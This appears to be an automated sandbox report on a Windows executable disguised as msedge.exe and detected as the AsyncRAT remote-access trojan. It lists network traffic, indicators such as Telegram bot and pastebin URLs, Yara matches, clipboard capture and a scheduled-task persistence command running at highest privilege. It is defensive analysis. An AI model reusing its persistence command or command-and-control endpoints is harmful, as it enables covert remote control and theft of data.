Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: upon-forming.gl.at.ply.gg
Source: global traffic	DNS traffic detected: DNS query: i.ibb.co

Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.ibb.co
Source: msedge.exe, 00000000.00000002.3551685304.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.14.dr	String found in binary or memory: http://upx.sf.net
Source: msedge.exe, msedge.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: msedge.exe, 00000000.00000002.3551685304.0000000002A4B000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.ibb.co
Source: msedge.exe, msedge.exe.0.dr	String found in binary or memory: https://i.ibb.co/Dwrj41N/Image.png
Source: msedge.exe, 0000000B.00000002.3530961194.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZnhxAV6a

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50062 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\Desktop\msedge.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\msedge.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: msedge.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\msedge.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B888BF6	0_2_00007FFD9B888BF6
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B881567	0_2_00007FFD9B881567
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B8899A2	0_2_00007FFD9B8899A2
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B881FB9	0_2_00007FFD9B881FB9
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 3_2_00007FFD9B881567	3_2_00007FFD9B881567
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 3_2_00007FFD9B881FB9	3_2_00007FFD9B881FB9
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 4_2_00007FFD9B8A1567	4_2_00007FFD9B8A1567
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 4_2_00007FFD9B8A1FB9	4_2_00007FFD9B8A1FB9
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 11_2_00007FFD9B891567	11_2_00007FFD9B891567
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 11_2_00007FFD9B891FB9	11_2_00007FFD9B891FB9

One or more processes crash

Source: C:\Users\user\Desktop\msedge.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6924 -s 1484

Sample file is different than original file name gathered from version info

Source: msedge.exe, 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe
Source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.e- vs msedge.exe
Source: msedge.exe, 00000000.00000000.1649864905.0000000000616000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe
Source: msedge.exe	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe
Source: msedge.exe.0.dr	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe

Uses 32bit PE files

Source: msedge.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: msedge.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: msedge.exe, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: msedge.exe, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: msedge.exe.0.dr, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'

Source: msedge.exe, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: msedge.exe, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: msedge.exe.0.dr, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: msedge.exe.0.dr, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/9@4/4

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Local\msedge.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\msedge.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\msedge.exe	Mutant created: \Sessions\1\BaseNamedObjects\LyRdBLj5iHwP8QCN
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6924
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: msedge.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: msedge.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\msedge.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msedge.exe

ReversingLabs: Detection: 78%

Source: C:\Users\user\Desktop\msedge.exe

File read: C:\Users\user\Desktop\msedge.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\msedge.exe "C:\Users\user\Desktop\msedge.exe"
Source: C:\Users\user\Desktop\msedge.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe "C:\Users\user\AppData\Local\msedge.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe "C:\Users\user\AppData\Local\msedge.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
Source: C:\Users\user\Desktop\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6924 -s 1484
Source: C:\Users\user\Desktop\msedge.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
